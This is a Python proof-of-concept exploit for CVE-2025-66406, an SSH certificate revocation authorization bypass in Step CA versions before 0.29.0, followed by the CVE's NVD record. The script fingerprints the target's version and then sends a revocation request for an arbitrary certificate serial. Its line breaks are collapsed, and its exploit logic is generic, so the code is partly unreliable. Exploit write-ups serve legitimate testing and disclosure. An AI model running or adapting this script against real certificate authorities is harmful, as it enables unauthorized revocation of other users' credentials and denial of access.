CVE-2025-66406

# PoC for CVE-2025-66406 - Step CA SSH Certificate Revocation Authorization Bypass # Note: Requires high privileges and SSHPOP provisioner configuration import requests import json import argparse def check_vulnerability(target_url, api_token): """ Check if target Step CA instance is vulnerable to CVE-2025-66406 """ headers = { 'Authorization': f'Bearer {api_token}', 'Content-Type': 'application/json' } # Check Step CA version version_url = f'{target_url}/version' try: resp = requests.get(version_url, headers=headers, timeout=10) version_info = resp.json() version = version_info.get('version', '') print(f'[*] Detected Step CA version: {version}') # Check if version is before 0.29.0 major, minor, patch = map(int, version.lstrip('v').split('.')[:3]) if major < 0 or (major == 0 and minor < 29): print('[+] Target appears to be vulnerable (version < 0.29.0)') return True else: print('[-] Target appears to be patched (version >= 0.29.0)') return False except Exception as e: print(f'[-] Error checking version: {e}') return None def exploit_revocation_bypass(target_url, api_token, target_serial): """ Exploit unauthorized SSH certificate revocation """ headers = { 'Authorization': f'Bearer {api_token}', 'Content-Type': 'application/json' } # Attempt unauthorized revocation revoke_url = f'{target_url}/api/ssh/revoke' payload = { 'serial': target_serial, 'type': 'ssh' # SSHPOP provisioner certificate } try: resp = requests.post(revoke_url, json=payload, headers=headers, timeout=10) if resp.status_code == 200: print(f'[+] Successfully revoked certificate {target_serial}') print('[+] Vulnerability confirmed - authorization bypass successful') return True else: print(f'[-] Revocation failed with status {resp.status_code}') print(f'[-] Response: {resp.text}') return False except Exception as e: print(f'[-] Error during exploitation: {e}') return False if __name__ == '__main__': parser = argparse.ArgumentParser(description='CVE-2025-66406 PoC') parser.add_argument('--url', required=True, help='Step CA target URL') parser.add_argument('--token', required=True, help='API token') parser.add_argument('--serial', required=True, help='Target certificate serial') args = parser.parse_args() print(f'[*] Testing CVE-2025-66406 on {args.url}') vulnerable = check_vulnerability(args.url, args.token) if vulnerable: exploit_revocation_bypass(args.url, args.token, args.serial)

{"cve": {"id": "CVE-2025-66406", "sourceIdentifier": "[email protected]", "published": "2025-12-03T20:16:26.560", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Step CA is an online certificate authority for secure, automated certificate management for DevOps. Prior to 0.29.0, there is an improper authorization check for SSH certificate revocation. This affects deployments configured with the SSHPOP provisioner. This vulnerability is fixed in 0.29.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.7, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://github.com/smallstep/certificates/security/advisories/GHSA-j7c9-79x7-8hpr", "source": "[email protected]"}]}}